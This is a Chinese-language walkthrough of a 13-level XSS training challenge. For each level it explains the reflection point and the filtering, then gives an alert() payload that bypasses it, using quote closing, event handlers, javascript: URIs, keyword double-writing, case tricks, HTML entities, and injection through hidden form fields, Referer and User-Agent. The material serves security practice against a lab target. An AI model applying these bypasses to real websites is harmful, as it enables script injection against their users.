Level_1
輸入點在url中，反射型

payload: http://118.89.167.246:2503/xss-game/level1.php?name=<script>alert(/xss/)</script>

Level 2
搜索型，查看元素可以看到輸入在input標簽內，需要閉合input標簽

Payload: “><script>alert(‘xss’)</script><”

Level 3
輸入點在input標簽的value屬性里面，嘗試閉合屬性，基于事件彈窗 ，雙引號失敗，試試 單引號

Paload: ‘ onmouseover=alert(‘xss’)

Level 4
和上一題一樣，輸入點也是在value屬性里面，這次用雙引號閉合屬性

Payload: “ onmouseover=alert(‘xss’) “

Level 5
過濾情況：
On替換為o_n
Script替換為sc_ript
大小寫嘗試了也不行，只能用別的辦法了

Payload: “><a href=javascript:alert(‘xss’)>111</a><”

Level 6.
過濾情況：
On替換為o_n
Script替換為sc_ript
Href替換為hr_ef
嘗試了一下用大小寫繞過

Payload: “><img Src=ss Onerror=alert(‘xss’)>“><Script>alert(‘xss’)</SCript>“><a HRef=javascript:alert(‘xss’)>hh</a>

Level 7
輸入一個”><script>alert(‘xss’)</script>試試，發現script標簽被刪除了！

Href和on也被刪除了，嘗試雙寫繞過
Payload:

“><scrscriptipt>alert(‘xss’)</scriscriptpt> “ oonnmouseover=alert ‘1’ “><a hrhrefef=javasscriptcript:alert(‘xss’)>hh</a>

Level 8
基礎知識：javascript:偽協議聲明了URL的主體是任意的javascript代碼，它由javascript的解釋器運行

Javascript會被替換為javasc_rpt,考慮用Html實體編碼繞過，r編碼為&#x72;

Payload: javasc&#x72;ipt:alert(‘xss’)

Level 9
Javascript會被替換為javasc_rpt,考慮用Html實體編碼繞過，r編碼為&#x72;
用上一關的payload試試，提示鏈接不合法，必須要有http://關鍵字

Payload: javasc&#x72;ipt:%0dhttp://www.0aa.me%0dalert(1) 或 javascript:alert(1)//http://www.0aa.me %0a %0d都為url編碼的換行符

Level 10
Keyword注入點，<、>都被過濾，幾乎不能突破。右鍵源代碼看到有個hidden的form表單，

Keyword參數后面輸入：

&t_link=” type=”text” 1&t_history=” type=”text” 2&t_sort =” type=”text” 3

查看注入點，發現t_sort字段可以注入

Payload: &t_sort=" type="text"onmouseover=alert`1` "

Level 11
和上題一樣有個hidden的表單，不過此題的注入點在t_ref字段，值為http referer，抓包修改

將referer頭修改為：” type=”text” onmouseover=alert `1` “

Forward放行后彈窗

Level 12
這一關的注入點在user-agent

和上題一樣，抓包，改user-agent

Payload:” type=”text” onmouseover=alert `1` “

Level 13
類似的，修改cookie參數

總結

以上是生活随笔為你收集整理的Xss挑战之旅writeup的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。